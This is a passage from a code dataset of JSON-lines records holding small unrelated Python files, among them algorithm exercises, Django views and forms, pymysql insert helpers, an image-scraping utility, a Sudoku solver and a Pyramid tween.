 Your application must check whether the\nparentheses in the given expression are opened and closed in the correct order.\"\"\"\n\ncheck = []\nexpression = str(input('Type the expression: '))\n\nfor c in expression:\n if c == '(':\n check.append(c)\n elif c == ')':\n if len(check) > 0:\n check.pop()\n else:\n check.append(c)\n\n# the stack is empty only if every ')' matched an earlier '('\nif len(check) == 0:\n print('valid expression')\nelse:\n print('invalid expression')\n","sub_path":"ExerciceList/ex083.py","file_name":"ex083.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333907951","text":"# https://www.hackerrank.com/challenges/30-binary-trees/problem\n\ndef levelOrder(self,root):\n leafs = [root]\n while len(leafs) > 0:\n leaf = leafs.pop(0)\n print(leaf.data, end=\" \")\n if leaf.left:\n leafs.append(leaf.left)\n if leaf.right:\n leafs.append(leaf.right)","sub_path":"30 Days of Code/Day 23 - BST Level-Order Traversal.py","file_name":"Day 23 - BST Level-Order Traversal.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"432434867","text":"from django.views.decorators.http import require_POST\nfrom django.utils.timezone import now\nfrom django.shortcuts import reverse, redirect, get_object_or_404\nfrom coupons.models import Coupon\n\n\n@require_POST\ndef activate_coupon(request):\n code = request.POST.get('code')\n if code:\n coupon = get_object_or_404(Coupon, code=code,\n valid_to__gte=now(),\n valid_from__lte=now())\n if coupon:\n request.session['coupon_code'] = code\n return redirect(reverse('bucket:bucket'))","sub_path":"coupons/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"149733237","text":"'''\r\nCreated on 2016. 9. 24.\r\n\r\n@author: Administrator\r\n'''\r\n\r\n# File I/O test, textbook p. 333\r\n# Serial and parallel communication all go through file objects, so this matters.
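 For example, fileWrite() below writes 'hello', seeks to offset 3, and writes 'hello' again, leaving 'helhello' in the file.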
\r\n\r\ndef fileWrite():\r\n print('file write ....')\r\n fp = open('test.log', 'w')\r\n print(\"fp.tell:\", fp.tell())\r\n fp.write('hello')\r\n fp.seek(3) # move the file pointer position\r\n print(\"fp.tell:\", fp.tell())\r\n fp.write('hello')\r\n print(\"fp.tell:\", fp.tell())\r\n fp.close()\r\n \r\ndef fileRead():\r\n print('file read ....')\r\n fp = open('test.log','r')\r\n print(\"fp.tell:\", fp.tell())\r\n rd = fp.read()\r\n print(\"fp.tell:\", fp.tell())\r\n fp.close()\r\n print(rd)\r\n \r\ndef fileWrite1():\r\n print('file write ....')\r\n fp = open('test.log', 'w')\r\n fp.write('abcdefghijklmnop')\r\n fp.close()\r\n \r\ndef fileWrite2():\r\n fp = open('test.log', 'w')\r\n fp.write('abc\\ndef\\nghi\\njkl\\nmno')\r\n fp.close()\r\n\r\ndef fileRead1():\r\n print('file read ....')\r\n fp = open('test.log','r')\r\n print(\"fp.tell:\", fp.tell())\r\n rd = fp.read(3)\r\n print(rd)\r\n print(\"fp.tell:\", fp.tell())\r\n rd = fp.read(3)\r\n print(rd)\r\n print(\"fp.tell:\", fp.tell())\r\n fp.close()\r\n\r\n# def fileRead2():\r\n# fp = open('test.log','r')\r\n# while True:\r\n# rd = fp.read(3)\r\n# if not rd:\r\n# break\r\n# print(rd)\r\n# fp.close()\r\n \r\ndef fileRead2():\r\n fp = open('test.log','r')\r\n while True:\r\n rd = fp.read(3)\r\n if not rd:\r\n break\r\n print(rd)\r\n fp.close()\r\n\r\ndef fileRead3():\r\n fp = open('test.log','r')\r\n for rd in fp: # iterates using readline\r\n print(rd)\r\n fp.close()\r\n\r\ndef fileRead4():\r\n fp = open('test.log','r')\r\n rd = fp.readlines()\r\n print(rd)\r\n fp.close()\r\n\r\n \r\nif __name__ == '__main__':\r\n# fileWrite()\r\n# fileRead()\r\n# fileWrite1()\r\n# fileRead1()\r\n# fileWrite1()\r\n# fileRead2()\r\n fileWrite2()\r\n fileRead4()\r\n ","sub_path":"fun_file.py","file_name":"fun_file.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"622543254","text":"# https://atcoder.jp/contests/arc004/tasks/arc004_2\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda:sys.stdin.readline().rstrip()\ndef resolve():\n n=int(input())\n D=[int(input()) for _ in range(n)]\n m=max(D); S=sum(D)\n print(S)\n print(max(0,2*m-S))\nresolve()\n","sub_path":"ARC004/b_maximum_and_minimum.py","file_name":"b_maximum_and_minimum.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415013937","text":"import pymysql\n\n# Establish connection and create cursor object.\ndef create_connection(host, user, pwd, db):\n connection = pymysql.connect(host = host,\n user = user,\n password = pwd,\n db = db)\n cursor = connection.cursor()\n return cursor, connection\n\n\n# Insert rows into table.\ndef insert(df, cursor, connection):\n # comma separated list of columns.\n cols = \",\".join(df.columns.tolist())\n\n print(\"Starting INSERTS for \",df.name)\n for row in df.itertuples(index = False):\n vals = \",\".join(['\"{}\"'.format(str(i)) for i in list(row)])\n sql_insert = \"INSERT INTO \" + df.name + \" (\" + cols + \") VALUES (\" + vals + \");\"\n cursor.execute(sql_insert)\n\n connection.commit()\n print(\"Completed INSERTS for \",df.name)\n\n# identify the latest game in the database.\ndef latest_info(cursor):\n cursor.execute(\"SELECT * FROM games ORDER BY ID DESC LIMIT 1\")\n return cursor.fetchall()\n \n\n# Update tables with latest games.\ndef update(df, cursor, connection):\n\n # comma separated list of columns.\n cols = 
\",\".join(df.columns.tolist())\n\n for row in df.itertuples(index = False):\n vals = ['\"{}\"'.format(str(i)) for i in list(row)]\n vals[0] = pymysql.NULL\n vals = \",\".join(vals)\n sql_insert = \"INSERT INTO \" + df.name + \" (\" + cols + \") VALUES (\" + vals + \");\"\n # print(sql_insert)\n cursor.execute(sql_insert)\n\n connection.commit()\n","sub_path":"Load.py","file_name":"Load.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"546190751","text":"import datetime\n\nimport bs4\nimport zxing\nimport requests\nimport time\nimport os, sys\nimport urllib.request\nimport re\n\nclass Utils(object):\n\n @staticmethod\n def isInBalckList(blacklist, toSearch):\n if blacklist is None:\n return False\n for item in blacklist:\n if toSearch.find(item) != -1:\n return True\n return False\n\n @staticmethod\n def getTimeFromStr(timeStr):\n # 13:47:32 or 2016-05-25 or 2016-05-25 13:47:32\n # all be transformed to datetime\n if '-' in timeStr and ':' in timeStr:\n return datetime.datetime.strptime(timeStr, \"%Y-%m-%d %H:%M:%S\")\n elif '-' in timeStr:\n return datetime.datetime.strptime(timeStr, \"%Y-%m-%d\")\n elif ':' in timeStr:\n date_today = datetime.date.today()\n date = datetime.datetime.strptime(timeStr, \"%H:%M:%S\")\n # date.replace(year, month, day): builds a new date object\n return date.replace(year=date_today.year, month=date_today.month, day=date_today.day)\n else:\n return datetime.date.today()\n\n # Check whether any of the given images is a QR code\n @staticmethod\n def isQRImages(image_paths):\n if image_paths is None:\n return False\n reader = zxing.BarCodeReader()\n # print(image_paths)\n for image_path in image_paths:\n image_path = str(image_path).replace(\"\\\\\", \"/\")\n print(image_path)\n barcode = reader.decode(image_path)\n if barcode is None:\n print(\"is None\")\n continue\n QR_content = barcode.parsed\n if QR_content != '':\n print(\"this is a QR code\")\n return True\n else:\n print(\"this is not a QR code\")\n print(\"no QR code found\")\n return False\n\n # Check that none of the images behind these hrefs is a QR code\n @staticmethod\n def isNotExitQRImages(imageURLs):\n if imageURLs is None:\n return True\n results_path = os.path.join(sys.path[0], \"stemp\")\n if not os.path.isdir(results_path):\n os.makedirs(results_path)\n\n imagePathAndImageNames = []\n imageRealPathAndNames = []\n i = 1\n for url in imageURLs:\n # download the image\n # local path to save it to\n FILETIMEFORMAT = '%Y%m%d_%X'\n file_time = 'c' + time.strftime(FILETIMEFORMAT, time.localtime()).replace(':', '')\n imageName = file_time + \"_\" + str(i) + '.png'.strip(' ')\n imageRealPathAndName = os.path.join(results_path, imageName).strip(' ')\n i = i + 1\n r = requests.get(url, stream=True)\n if r.status_code == 200:\n open(imageRealPathAndName, 'wb').write(r.content) # write the content to the image file\n del r\n imageRealPathAndNames.append(imageRealPathAndName)\n path = str(os.path.join(\"stemp\", str(imageName)))\n imagePathAndImageNames.append(path)\n isExitQRImages = Utils.isQRImages(imagePathAndImageNames)\n # delete the local images\n for imageRealPathAndName in imageRealPathAndNames :\n os.remove(imageRealPathAndName)\n if isExitQRImages:\n return False\n else:\n return True\n\n # Fetch page content from a URL\n @staticmethod\n def getHtmlContentFromURL(url):\n # get the HTML content\n return urllib.request.urlopen(url).read().decode('utf-8')\n\n # Extract image URLs from the page content\n @staticmethod\n def getImageURLFromURL(url):\n htmlContent = Utils.getHtmlContentFromURL(url)\n # image URLs inside the HTML\n reg = r'src=\"(.*?\\.(jpg|png|gif))\"'\n img = re.compile(reg)\n imglist = re.findall(img, htmlContent)\n return imglist\n\n # Extract image URLs from the page content (excluding user avatars)\n
 ## usage:\n # imglist = Utils.getImageURLNotUserHeadFromURL(Utils.getHtmlContentFromURL(\"https://www.douban.com/group/topic/151841534/\"), tag='div', attrs={'class': {'user-face','side-reg'}})\n @staticmethod\n def getImageURLNotUserHeadFromURL(htmlContent, tag='div', attrs={'class': {'user-face','side-reg'}}):\n # strip the avatar tags\n soup = bs4.BeautifulSoup(htmlContent, 'html.parser')\n [i.extract() for i in (soup.findAll(name=tag, attrs=attrs))]\n # image URLs inside the HTML\n reg = r'src=\"(.*?\\.jpg)\"'\n img = re.compile(reg)\n imglist = re.findall(img, str(soup))\n return imglist\n\n # Get the text of the title and the body\n @staticmethod\n def getTitleAndContentTextFromURL(htmlContent, titleTag='h1', titleAttrs={}, contentTag='div',\n contentAttrs={'id': 'link-report'}):\n # parse the source, e.g. BeautifulSoup(htmlContent, \"html.parser\")\n htmlContentParser = bs4.BeautifulSoup(htmlContent, 'lxml')\n # title section\n titleText = htmlContentParser.findAll(name=titleTag)\n\n titleText = Utils.subTab(titleText)\n # body section\n contentText = htmlContentParser.findAll(name=contentTag, attrs=contentAttrs)\n contentText = Utils.subTab(contentText)\n\n return titleText, contentText\n\n # Clean the document by removing tags\n @staticmethod\n def subTab(html):\n rc = re.compile(\"\\<.*?\\>\")\n return rc.sub('', str(html))\n\n # Get the price range\n @staticmethod\n def getPriceFromText(htmlContentText):\n if (htmlContentText is None):\n return -1\n # clean the document by removing tags\n contentText = Utils.subTab(htmlContentText)\n\n p = re.compile(r'\\d+(?=\\u5143)')  # digits followed by 元 (yuan)\n price = re.findall(p, contentText)\n maxPrice = minPrice = -1\n if price:\n price = list(map(int, price))\n if price:\n if len(price) >= 2:\n maxPrice = max(price)\n minPrice = min(price)\n else:\n maxPrice = minPrice = max(price)\n else:\n return -1\n return minPrice, maxPrice\n\n","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"353209611","text":"# ---\n# jupyter:\n#   jupytext:\n#     text_representation:\n#       extension: .py\n#       format_name: light\n#       format_version: '1.5'\n#     jupytext_version: 1.4.1\n#   kernelspec:\n#     display_name: Python 3\n#     language: python\n#     name: python3\n# ---\n\n# + endofcell=\"--\"\n# # +\n\n# +\n# Data processing script to create a dense baseline dataframe for CLD.jl from the TADPOLE dataset\n\nimport pandas as pd\nimport pickle\n\nwith open(\"../out/merged_data.pkl\", \"rb\") as pickle_file:\n data = pickle.load(pickle_file)\n\n# # +\nmodalities_to_use = [\"diagnosis_latest\",\n\"snp_labeled\",\n\"MRI_FSX_SV_labeled_latest\",\n\"MRI_FSX_CV_labeled_latest\",\n\"MRI_FSX_SA_labeled_latest\",\n\"MRI_FSX_TA_labeled_latest\",\n\"MRI_FSX_TS_labeled_latest\",\n\"MRI_FSL_SV_labeled_latest\",\n\"MRI_FSL_CV_labeled_latest\",\n\"MRI_FSL_SA_labeled_latest\",\n\"MRI_FSL_TA_labeled_latest\",\n\"MRI_FSL_TS_labeled_latest\",\n]\n\n\"\"\" Column 'ST8SV_UCSFFSL_02_01_16_UCSFFSL51ALL_08_01_16' had 389 out of 733 rows with N/A. \nColumn 'ST8SV_UCSFFSX_11_02_15_UCSFFSX51_08_01_16' had 275 out of 733 rows with N/A.
\n36 other columns had all N/As (so they are also removed in step below, and the remaining columns all had less than 200 N/A's)\nBy dropping these two columns, we go from 270 rows after removing N/A's to 524 rows\n\"\"\"\ndrop = [\"ST8SV_UCSFFSL_02_01_16_UCSFFSL51ALL_08_01_16\", \"ST8SV_UCSFFSX_11_02_15_UCSFFSX51_08_01_16\"]#\"FAQ\", \"MOCA\", \"CDRSB\", \"ST8SV_UCSFFSX_11_02_15_UCSFFSX51_08_01_16\"]#, \"ADAS11\", \"ADAS13\", \"MMSE\"]\n\n\n# -\n\ndef get_data_for_experiment_with_modalities(modalities, target_modality, target_column, data, columns_to_drop=None, verbose=False):\n \"\"\"Clean and return the data with the particular modalities and desired target\n \n Args:\n modalities (list): The list of modalities to use as features\n target_modality (str): The name of the modality with the desired target\n target_column (str): The name of the column within the target\n data (dict): The saved dataset\n columns_to_ignore (list, optional): Any columns to drop from the dataframe before cleaning the data. Defaults to None.\n verbose (bool, optional): Whether to display verbose print messages. Defaults to False.\n \n Returns:\n tuple: The features and targets cleaned up for experimentation\n \"\"\"\n\n df = pd.concat([pd.DataFrame.from_records(data[modality]).T for modality in modalities], axis=1)\n \n #The first column is labeled with an integer, 0. Replace with 'diagnosis'\n new_names = list(df.columns)\n new_names[0] = \"diagnosis\"\n df.columns = new_names\n \n ecog_columns = [column for column in df.columns if column.startswith(\"Ecog\")]\n \n \n df = df.drop(ecog_columns, axis=1)\n \n if columns_to_drop is not None:\n df = df.drop(columns_to_drop, axis=1)\n\n if verbose:\n print(df.shape)\n print(\"Row analysis of NaNs\")\n with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also\n print(df.isna().sum(axis=0))\n\n df = df.dropna(axis=0, how=\"all\")\n if verbose:\n print(df.isna().sum(axis=0))\n print(df.shape)\n print(\"Column analysis of NaNs\")\n print(df.isna().sum(axis=1))\n\n df = df.dropna(axis=1, how=\"all\")\n if verbose:\n print(df.isna().sum(axis=1))\n print(df.shape)\n\n df = df.dropna(axis=0, how=\"any\")\n if verbose:\n print(df.isna().sum().sum())\n print(df.shape)\n\n \"\"\"\n targets = df[[target_column]]\n if target_column == \"DX\":\n targets = targets[\"DX\"].apply(convert_string_to_integer_diagnosis)\n \"\"\"\n \n\n #features = df.drop(target_column, axis=1)\n\n return df \n\nfeatures = get_data_for_experiment_with_modalities(modalities_to_use, None, None, data, drop, verbose=True)\n\n# Lengths obtained by reading each modality in individually and removing the necessary columns\n# # +\ndiagnosis_latest_LEN = 1\nsnp_labeled_LEN = 1224\nMRI_FSX_SV_labeled_latest_LEN = 44\nMRI_FSX_CV_labeled_latest_LEN = 71\nMRI_FSX_SA_labeled_latest_LEN = 72\nMRI_FSX_TA_labeled_latest_LEN = 70\nMRI_FSX_TS_labeled_latest_LEN = 70\nMRI_FSL_SV_labeled_latest_LEN = 44\nMRI_FSL_CV_labeled_latest_LEN = 71\nMRI_FSL_SA_labeled_latest_LEN = 72\nMRI_FSL_TA_labeled_latest_LEN = 70\nMRI_FSL_TS_labeled_latest_LEN = 70\n\nfeatures.to_csv(\"../out/tadpole_dx_snp_fsx_fsl_latest.csv\")\nprint(\"Wrote results to ../out/tadpole_dx_snp_fsx_fsl_latest.csv\")\n","sub_path":"alz/notebooks/tadpolelatest.py","file_name":"tadpolelatest.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514510713","text":"from django.db import models\n\n# Create your models 
here.\nfrom Product.models import Product\nfrom User.models import User\n\n\nclass ApiTest(models.Model):\n product = models.ForeignKey(Product, on_delete=models.CASCADE, verbose_name='Product', null=True)\n api_test_name = models.CharField(max_length=64, null=False, blank=False, verbose_name='Workflow API name')\n api_test_desc = models.CharField(max_length=64, null=False, blank=False, verbose_name='Description')\n api_tester = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name='Tester')\n api_test_res = models.BooleanField(verbose_name='Test result')\n create_time = models.DateTimeField(auto_now=True, verbose_name='Created at')\n\n def __str__(self):\n return self.api_test_name\n\n class Meta:\n db_table = 'ApiTest'\n verbose_name = 'Test case'\n verbose_name_plural = verbose_name\n\n\nREQUEST_METHOD = (('get', 'get'), ('post', 'post'), ('put', 'put'), ('delete',\n 'delete'),\n ('patch', 'patch'))\n\n\nclass ApiTestStep(models.Model):\n api_name = models.CharField(max_length=100, null=False, blank=False, verbose_name='Case name')\n api_url = models.CharField(max_length=200, null=False, blank=False, verbose_name='API URL')\n api_step = models.CharField(max_length=100, null=True, verbose_name='Test step')\n api_param_val = models.CharField(max_length=800, null=False, blank=False, verbose_name='Request params and values')\n api_method = models.CharField(max_length=200, null=True, verbose_name='API method', default='get',\n choices=REQUEST_METHOD)\n api_result = models.CharField(max_length=200, null=False, blank=False, verbose_name='Expected result')\n api_response = models.CharField(max_length=5000, null=True, blank=True, verbose_name='Response data')\n api_status = models.BooleanField(verbose_name='Passed')\n create_time = models.DateTimeField(auto_now=True, verbose_name='Created at')\n\n api_test = models.ForeignKey(ApiTest, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.api_name\n\n class Meta:\n db_table = 'ApiTestStep'\n verbose_name = 'Test case step'\n verbose_name_plural = verbose_name\n\n\n\n\nclass Apis(models.Model):\n product = models.ForeignKey(Product, on_delete=models.CASCADE, null=True, verbose_name='Product')\n api_name = models.CharField(max_length=100, verbose_name='API name')\n api_url = models.CharField(max_length=200, verbose_name='URL')\n api_par_val = models.CharField(max_length=800, verbose_name='Request params and values')\n api_method = models.CharField(choices=REQUEST_METHOD, default='get', max_length=200, verbose_name='Request method')\n api_result = models.CharField(max_length=200, verbose_name='Expected result')\n api_status = models.BooleanField(verbose_name='Passed')\n create_time = models.DateTimeField(auto_now=True, verbose_name='Created at')\n\n def __str__(self):\n return self.api_name\n\n class Meta:\n db_table = 'Apis'\n verbose_name = 'Single-scenario API'\n verbose_name_plural = verbose_name","sub_path":"Pro_Api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"496336399","text":"# General Sudoku Direct Solver\n# By Peter Zenger\n# April 1, 20\n\nfrom __future__ import print_function\nfrom copy import deepcopy\nimport os, sys, math, inspect\n\nm = 0\nn = 0\nnumbers = []\n\n\nclass Value():\n \"\"\"\n A Value in a square\n Stores its value, its possible values, its location,\n and whether it has been propagated or not\n \"\"\"\n\n def __init__(self, value):\n self.possible_values = []\n self.value = int(value)\n\n def remove_value(self, value):\n \"\"\" Removes a value from the set of possible_values \"\"\"\n if int(value) in self.possible_values:\n self.possible_values.remove(int(value))\n 
return True\n return False\n\n def set_value(self, value=-1):\n \"\"\" Sets the value and flags Value to have been propagated \"\"\"\n if value == -1:\n self.value = self.possible_values[0]\n else:\n self.value = int(value)\n self.possible_values = [self.value] # added\n\n if (self.row, self.column) in possibility_list:\n possibility_list.remove((self.row, self.column))\n\n def setup(self, row, column):\n \"\"\"\n Compute location of this Value\n Update the possible_values\n \"\"\"\n self.row = row\n self.column = column\n self.square = compute_square(row, column)\n if self.value > 0:\n self.possible_values = [self.value]\n return True\n else:\n self.possible_values = numbers[:]\n return False\n\n\ndef init_board(name):\n \"\"\"\n Loads a board which is defined by an NxN grid in a file\n The board can be formated 'DDDD' or 'D D D D D'\n The board must be of the size M^2 by M^2\n \"\"\"\n try:\n f = open(os.path.normpath('../boards/' + name), 'r')\n data = f.readlines()\n f.close()\n\n board_2d = []\n formatting = True\n if ' ' in data[0]:\n formatting = False\n\n for line in data:\n new_row = []\n\n if formatting:\n for x in line.strip():\n new_row.append(Value(x))\n else:\n for x in line.strip().split(' '):\n new_row.append(Value(x))\n\n board_2d.append(new_row)\n\n global numbers, m, n\n\n n = len(board_2d[0]) # Size of each side of the square\n m = int(math.sqrt(n)) # Size of each subsquare\n numbers = range(1, n + 1) # Possible values for a square to have\n\n # Setup each square of the board\n for row in range(n):\n for col in range(n):\n if board_2d[row][col].setup(row, col):\n to_visit.append(board_2d[row][col])\n possibility_list.append((row, col))\n return board_2d\n\n except IOError:\n print(os.path.normpath('../boards/' + name))\n print(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))))\n print(\"Error opening '%s', check spelling and try again\" % name)\n sys.exit(-1)\n\n\ndef compute_square(row, column):\n \"\"\"Computes which sub-square number the square resides in\"\"\"\n\n square_number = int(row / m) * (n / m) + int(column / m)\n return square_number\n\n\ndef stringify_board(board):\n \"\"\" Turn the board into a string for outputting \"\"\"\n\n output = []\n for line in board:\n tmp = []\n for item in line:\n tmp.append(str(item.value))\n tmp.append(' ')\n tmp.append('\\n')\n output.append(tmp)\n\n return ''.join(str(item) for line in output for item in line)\n\n\ndef propagate(value):\n \"\"\" Removes possible values from each intersecting square \"\"\"\n # Value is object\n\n remove_rows(value.value, value.row)\n remove_columns(value.value, value.column)\n remove_square(value.value, value.square)\n\n return\n\n# Do something to only grab unfilled values\ndef remove_rows(value, row):\n return [board[row][col].remove_value(value) for col in xrange(n)]\n\n\ndef remove_columns(value, col):\n return [board[row][col].remove_value(value) for row in xrange(n)]\n\n\ndef remove_square(value, square):\n row = int(square / m) * m\n col = (square % m) * m\n if n <= 2:\n return\n return [board[row + i][col + j].remove_value(value) for i in range(0, m) for j in range(0, m)]\n\n\ndef get_lowest_possibility():\n \"\"\" Returns the square that has the least number of possibilities\"\"\"\n low = 10000\n low_item = None\n for r, c in possibility_list:\n if len(board[r][c].possible_values) < low:\n low = len(board[r][c].possible_values)\n low_item = board[r][c]\n\n if low_item:\n #possibility_list.remove(low_item)\n return [low_item]\n else:\n return None\n\n\ndef 
timeout(start):\n # Timeout at 15 minutes\n if time.time() - (15*60) > start:\n return True\n return False\n\ndef main():\n if len(sys.argv) < 2 or len(sys.argv) > 3:\n print(\"Peter Zenger's Sudoku solver program\")\n print(\"Usage: %s [INPUT FILE]\" % sys.argv[0])\n sys.exit(-1)\n\n input_board = sys.argv[1]\n\n global board, to_visit, possibility_list\n contradiction = False\n to_visit = [] # List of nodes to propagate\n\n possibility_list = []\n\n board = init_board(input_board)\n\n branch_boards = []\n\n solved = False\n start_time = time.time()\n while not contradiction and not solved and not timeout(start_time):\n if to_visit:\n for item in to_visit:\n if len(item.possible_values) == 0:\n contradiction = True\n elif len(item.possible_values) == 1:\n item.set_value()\n propagate(item)\n else:\n\n # Save each branch except the first\n for v in item.possible_values[1:]:\n # Deepcopying both is diverging board and possibility_list values\n branch_boards.append(\n (deepcopy(board),\n possibility_list[:],\n deepcopy(item),\n v)\n )\n\n # Explore first branch\n item.set_value(item.possible_values[0])\n propagate(item)\n\n to_visit = get_lowest_possibility()\n\n if contradiction and len(branch_boards) > 0:\n # If there are unexplored branches, explore them\n board, possibility_list, next_value, value = branch_boards.pop()\n\n #print(\"Branching: %d unexplored %d\" % (len(branch_boards), len(possibility_list)))\n\n board[next_value.row][next_value.column].set_value(value)\n to_visit = [board[next_value.row][next_value.column]]\n\n contradiction = False\n\n # If the # of filled squares equals the total squares, the puzzle is solved\n if len(possibility_list) == 0: # every square has been filled\n solved = True\n\n if contradiction:\n print(\"!!! UNSATISFIABLE !!!\")\n elif timeout(start_time):\n print(\"/// TIMEOUT AFTER 15 MINUTES ///\")\n else:\n print(\"~~~SUCCESS~~~\")\n output_board = stringify_board(board)\n\n print(output_board)\n\n\nif __name__ == \"__main__\":\n import time\n\n time1 = time.time()\n main()\n time2 = time.time()\n print(time2 - time1)\n","sub_path":"direct/solver_3.py","file_name":"solver_3.py","file_ext":"py","file_size_in_byte":7351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"183618182","text":"#!/usr/bin/env python3\n\"\"\"\nClean unnecessary preprocessor directives out of C/C++ source files.\nA path to a working makefile is required.\n\nAuthor : bind3v\n\"\"\"\n\nimport sys\nimport os\nimport subprocess\nimport glob\nfrom argparse import ArgumentParser\n\n\ndef find_make(path):\n make = False\n if not os.path.exists(path):\n print(\"{} doesn't exist\".format(path))\n sys.exit(1)\n for file in os.listdir(path):\n if file.lower() == 'makefile':\n make = True\n break\n return make\n\n\ndef parse_cli():\n parser = ArgumentParser(description='Source files cleaner')\n parser.add_argument('--path', nargs=1, action='store',\n help='Path to project files')\n parser.add_argument('--make', nargs=1, action='store',\n help='Add make option (default: make all)')\n parser.add_argument('--list', action='store_true',\n help='List only')\n parser.add_argument('--rm', action='store_true',\n help='Remove unnecessary directives')\n return parser.parse_args()\n\n\ndef run_make(cmd):\n make = subprocess.Popen(cmd, shell=True,\n stdout=subprocess.PIPE,\n stderr=sys.stdout.fileno())\n while True:\n line = make.stdout.readline()\n if not line:\n break\n print(line)\n sys.stdout.flush()\n\n\ndef parse_hdr(cmd, mode='list'):\n files = 
 files = glob.glob('**/*.*', recursive=True)\n cfiles = [cf for cf in files if\n cf.endswith(\".c\") or\n cf.endswith(\".h\") or\n cf.endswith(\".cpp\")]\n print(cfiles)\n\n\ndef main():\n args = parse_cli()\n path = ''\n if args.path:\n found = find_make(args.path[0])\n if found:\n path = os.path.abspath(args.path[0])\n else:\n found = find_make('.')\n if not found:\n print(\"Makefile doesn't exist.\")\n sys.exit(1)\n if path:\n os.chdir(path)\n cmd = 'make'\n if args.make:\n cmd = ' '.join([cmd, args.make[0]])\n if args.list:\n parse_hdr(cmd)\n if args.rm:\n parse_hdr(cmd, mode='rm')\n\n\nif __name__ == '__main__':\n main()\n ","sub_path":"cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"97959102","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nfrom json import JSONEncoder\n\nfrom pyramid_hypernova.batch import BatchRequest\nfrom pyramid_hypernova.plugins import PluginController\nfrom pyramid_hypernova.token_replacement import hypernova_token_replacement\n\n\ndef hypernova_tween_factory(handler, registry):\n def hypernova_tween(request):\n request.hypernova_batch = configure_hypernova_batch(registry, request)\n\n response = handler(request)\n\n if not request.hypernova_batch.jobs:\n return response\n\n try:\n # Skip token replacement logic if explicitly flagged to\n if request.disable_hypernova_tween:\n return response\n except AttributeError:\n pass\n\n with hypernova_token_replacement(request.hypernova_batch) as body:\n body['content'] = response.text\n\n response.text = body['content']\n\n return response\n\n return hypernova_tween\n\n\ndef configure_hypernova_batch(registry, request):\n get_job_group_url = registry.settings['pyramid_hypernova.get_job_group_url']\n\n plugins = registry.settings.get('pyramid_hypernova.plugins', [])\n plugin_controller = PluginController(plugins)\n\n batch_request_factory = registry.settings.get(\n 'pyramid_hypernova.batch_request_factory',\n BatchRequest,\n )\n\n json_encoder = registry.settings.get('pyramid_hypernova.json_encoder', JSONEncoder())\n\n return batch_request_factory(\n get_job_group_url=get_job_group_url,\n plugin_controller=plugin_controller,\n json_encoder=json_encoder,\n pyramid_request=request,\n )\n","sub_path":"pyramid_hypernova/tweens.py","file_name":"tweens.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"382611547","text":"from django import forms\nfrom .models import Sinppet\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout,Submit\n\n\nclass NameWidget(forms.MultiWidget):\n\n def __init__(self,attrs=None):\n super().__init__([\n forms.TextInput(),\n forms.TextInput()\n ],attrs)\n\n def decompress(self,value):\n if value:\n return value.split(' ', 1) # split \"First Last\" into the two sub-widgets; '' is not a valid separator\n return ['','']\n\nclass NameField(forms.MultiValueField):\n\n widget = NameWidget\n def __init__(self,*args,**kwargs):\n\n fields = (\n forms.CharField(),\n forms.CharField(),\n )\n\n super().__init__(fields,*args,**kwargs)\n\n def compress(self,data_list):\n return f'{data_list[0]} {data_list[1]}'\n\nclass ContactForm(forms.Form):\n #name = forms.CharField()\n # Multivalue field Example\n name = NameField()\n email = forms.CharField(label='E-mail')\n category = forms.ChoiceField(choices=[('question','Question'),('other','Other')])\n
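 # (added note) subject may be left blank: required=False lets an empty value pass validation\n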
 subject = forms.CharField(required=False)\n body = forms.CharField(widget=forms.Textarea)\n\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n self.helper = FormHelper() # must be an instance, not the class itself\n self.helper.form_method = 'post'\n\n #Adding Submit Button\n self.helper.layout = Layout(\n 'name',\n 'email',\n 'category',\n 'subject',\n 'body',\n Submit('submit','Submit',css_class='btn-success')\n \n )\n\n\nclass SnipperForm(forms.ModelForm):\n\n class Meta:\n model = Sinppet\n fields = ('name','body')","sub_path":"django_forms_multivalue/myapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
